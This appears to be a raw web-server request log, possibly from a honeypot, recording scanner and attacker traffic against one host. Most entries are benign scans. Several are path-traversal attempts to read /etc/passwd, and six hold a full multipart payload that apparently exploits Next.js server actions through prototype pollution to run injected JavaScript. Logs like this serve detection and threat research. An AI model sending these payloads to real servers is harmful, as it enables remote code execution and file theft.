Sec-Fetch-Dest: document
Sec-Fetch-Site: none
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Platform: "Linux"
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 68.183.20.198:34066
Path: /
URL: /
Method: GET
[2026-03-01 08:17:02] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.34.212.9:59986
Path: //etc/passwd
URL: //etc/passwd
Method: GET
[2026-03-01 08:14:18] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.34.212.9:59974
Path: /etc/passwd
URL: /etc/passwd
Method: GET
[2026-03-01 08:14:18] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.34.212.9:59966
Path: /../../../../../../../../../../etc/passwd
URL: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Method: GET
[2026-03-01 08:14:18] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.34.212.9:59956
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-01 08:14:18] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.34.212.9:59958
Path: /..\..\..\..\..\..\etc\passwd
URL: /..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
Method: GET
[2026-03-01 08:14:18] === HTTP Request ===
[2026-03-01 07:38:43] Main page accessed - IP: 198.235.24.241:57808
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.241:57808
Path: /
URL: /
Method: GET
[2026-03-01 07:38:43] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: finance.vulnberries.ru
RemoteAddr: 198.235.24.101:60906
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-01 07:33:58] === HTTP Request ===
===================
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:40810
Path: /jars
URL: /jars
Method: GET
[2026-03-01 06:54:56] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.241:51446
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-01 06:28:35] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: auth.vulnberries.ru
RemoteAddr: 198.235.24.56:60468
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-01 06:22:12] === HTTP Request ===
[2026-03-01 05:57:30] Main page accessed - IP: 40.74.212.73:43564
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 40.74.212.73:43564
Path: /
URL: /
Method: GET
[2026-03-01 05:57:30] === HTTP Request ===
[2026-03-01 05:33:10] Main page accessed - IP: 66.228.53.136:14126
===================
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.228.53.136:14126
Path: /
URL: /
Method: GET
[2026-03-01 05:33:10] === HTTP Request ===
[2026-03-01 05:33:05] Main page accessed - IP: 172.104.210.105:35784
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 172.104.210.105:35784
Path: /
URL: /
Method: GET
[2026-03-01 05:33:05] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: media.vulnberries.ru
RemoteAddr: 198.235.24.253:60038
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-01 05:18:16] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me
RemoteAddr: 198.235.24.59:57552
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-01 03:25:09] === HTTP Request ===
===================
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 147.185.132.165
Via: 1.1 Caddy
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40650
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-01 02:28:26] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.32.178.47:52674
Path: /config.json
URL: /config.json
Method: GET
[2026-03-01 00:48:19] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.32.178.47:52664
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-01 00:48:19] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.32.178.47:52670
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-01 00:48:19] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.32.178.47:52660
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-01 00:48:19] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.32.178.47:52654
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-01 00:48:19] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.32.178.47:52652
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-01 00:48:19] === HTTP Request ===
[2026-03-01 00:48:01] Main page accessed - IP: 152.32.178.47:46144
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.32.178.47:46144
Path: /
URL: /
Method: GET
[2026-03-01 00:48:01] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:60674
Path: /jars
URL: /jars
Method: GET
[2026-02-28 23:32:32] === HTTP Request ===
[2026-02-28 21:34:15] Main page accessed - IP: 176.65.149.45:45454
===================
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:45454
Path: /
URL: /
Method: GET
[2026-02-28 21:34:15] === HTTP Request ===
===================
------WebKitFormBoundaryx1242390171487--
------WebKitFormBoundaryx1242390171487
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1242390171487
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 189069+true+6571094;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1242390171487
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1242390171487
X-Nextjs-Html-Request-Id: ilovepoop_1242390171487
X-Nextjs-Request-Id: poop1234
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:60680
Path: /api/route
URL: /api/route
Method: POST
[2026-02-28 19:39:54] === HTTP Request ===
===================
------WebKitFormBoundaryx2411351712127--
------WebKitFormBoundaryx2411351712127
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2411351712127
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 306362+true+7870923;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2411351712127
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2411351712127
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_2411351712127
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:60678
Path: /app
URL: /app
Method: POST
[2026-02-28 19:39:54] === HTTP Request ===
===================
------WebKitFormBoundaryx249307941345--
------WebKitFormBoundaryx249307941345
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx249307941345
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 293876+true+848344;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx249307941345
X-Nextjs-Html-Request-Id: ilovepoop_249307941345
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx249307941345
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:60674
Path: /_next/server
URL: /_next/server
Method: POST
[2026-02-28 19:39:54] === HTTP Request ===
===================
------WebKitFormBoundaryx188220486609--
------WebKitFormBoundaryx188220486609
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx188220486609
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 182644+true+1030532;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx188220486609
X-Nextjs-Request-Id: poop1234
Next-Action: x
X-Nextjs-Html-Request-Id: ilovepoop_188220486609
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx188220486609
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Content-Length: 518
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:60670
Path: /api
URL: /api
Method: POST
[2026-02-28 19:39:54] === HTTP Request ===
===================
------WebKitFormBoundaryx1129375383767--
------WebKitFormBoundaryx1129375383767
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1129375383767
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 223462+true+5053993;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1129375383767
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1129375383767
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1129375383767
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:60664
Path: /_next
URL: /_next
Method: POST
[2026-02-28 19:39:54] === HTTP Request ===
[2026-02-28 19:39:53] Main page accessed - IP: 193.32.162.28:60662
===================
------WebKitFormBoundaryx2407718321011--
------WebKitFormBoundaryx2407718321011
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2407718321011
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 330921+true+7275810;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2407718321011
X-Nextjs-Html-Request-Id: ilovepoop_2407718321011
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2407718321011
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:60662
Path: /
URL: /
Method: POST
[2026-02-28 19:39:53] === HTTP Request ===
[2026-02-28 19:39:53] Main page accessed - IP: 193.32.162.28:60640
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:60640
Path: /
URL: /
Method: GET
[2026-02-28 19:39:53] === HTTP Request ===
[2026-02-28 19:38:44] Main page accessed - IP: 172.30.0.12:33504
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 198.235.24.239
Via: 1.1 Caddy
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33504
Path: /
URL: /
Method: GET
[2026-02-28 19:38:44] === HTTP Request ===
[2026-02-28 18:51:50] Main page accessed - IP: 198.235.24.108:50468
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.108:50468
Path: /
URL: /
Method: GET
[2026-02-28 18:51:50] === HTTP Request ===
===================
Accept: */*
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 24.144.104.6:57770
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-28 18:48:13] === HTTP Request ===
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 24.144.104.6:57784
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-28 18:48:13] === HTTP Request ===
[2026-02-28 18:48:13] Main page accessed - IP: 24.144.104.6:57764
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 24.144.104.6:57764
Path: /
URL: /
Method: GET
[2026-02-28 18:48:13] === HTTP Request ===
[2026-02-28 18:46:19] Main page accessed - IP: 68.183.16.131:58332
===================
User-Agent: Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 68.183.16.131:58332
Path: /
URL: /
Method: GET
[2026-02-28 18:46:19] === HTTP Request ===
[2026-02-28 17:31:01] Main page accessed - IP: 87.236.176.65:35137
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 87.236.176.65:35137
Path: /
URL: /
Method: GET
[2026-02-28 17:31:01] === HTTP Request ===
[2026-02-28 14:41:37] Main page accessed - IP: 34.79.173.175:60212
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.79.173.175:60212
Path: /
URL: /
Method: GET
[2026-02-28 14:41:37] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.91.9.177:49240
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-28 14:09:04] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.91.9.177:49226
Path: /nobody/favicon.ico
URL: /nobody/favicon.ico
Method: GET
[2026-02-28 14:09:03] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.91.9.177:49214
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-28 14:09:03] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.91.9.177:49200
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-28 14:09:03] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.91.9.177:49190
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-28 14:09:03] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.91.9.177:49180
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-28 14:09:02] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.91.9.177:49170
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-28 14:09:02] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.91.9.177:49160
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-28 14:09:00] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.91.9.177:49152
Path: /login.rsp
URL: /login.rsp
Method: GET
[2026-02-28 14:09:00] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.91.9.177:49136
Path: /skin/default_1/images/logo.png
URL: /skin/default_1/images/logo.png
Method: GET
[2026-02-28 14:08:59] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.91.9.177:56732
Path: /image/lgbg.jpg
URL: /image/lgbg.jpg
Method: GET
[2026-02-28 14:08:58] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.91.9.177:56716
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-28 14:08:58] === HTTP Request ===
[2026-02-28 14:08:57] Main page accessed - IP: 34.91.9.177:56708
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.91.9.177:56708
Path: /
URL: /
Method: GET
[2026-02-28 14:08:57] === HTTP Request ===
[2026-02-28 14:03:41] Main page accessed - IP: 104.199.46.221:50530
===================
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 104.199.46.221:50530
Path: /
URL: /
Method: GET
[2026-02-28 14:03:41] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.215:47756
Path: /..\..\..\..\..\..\etc\passwd
URL: /..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
Method: GET
[2026-02-28 13:41:59] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.215:47746
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-02-28 13:41:59] === HTTP Request ===
[2026-02-28 12:34:20] Main page accessed - IP: 89.110.97.157:42590
===================
Accept-Encoding: gzip
Accept: */*
